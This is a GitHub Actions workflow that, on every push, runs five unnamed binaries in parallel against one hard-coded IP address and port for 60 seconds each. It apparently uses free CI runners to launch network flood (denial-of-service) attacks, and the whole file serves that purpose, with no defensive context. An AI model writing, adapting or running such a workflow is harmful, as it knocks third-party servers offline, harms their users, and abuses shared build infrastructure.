name: Multi-Binary Task
on: [push]

jobs:
  execute:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        binary_index: [0, 1, 2, 3, 4]
    steps:
    - uses: actions/checkout@v3
    
    - name: Make all binaries executable
      run: |
        chmod +x soul Spike mrx vishal soulcracks
    
    - name: Execute Binary ${{ matrix.binary_index }}
      run: |
        case ${{ matrix.binary_index }} in
          0)
            ./soul 20.235.150.109 26192 60
            ;;
          1)
            ./Spike 20.235.150.109 26192 60 1024 999
            ;;
          2)
            ./mrx 20.235.150.109 26192 60 50 150
            ;;
          3)
            ./vishal 20.235.150.109 26192 60
            ;;
          4)
            ./soulcracks 20.235.150.109 26192 60 1600
            ;;
        esac
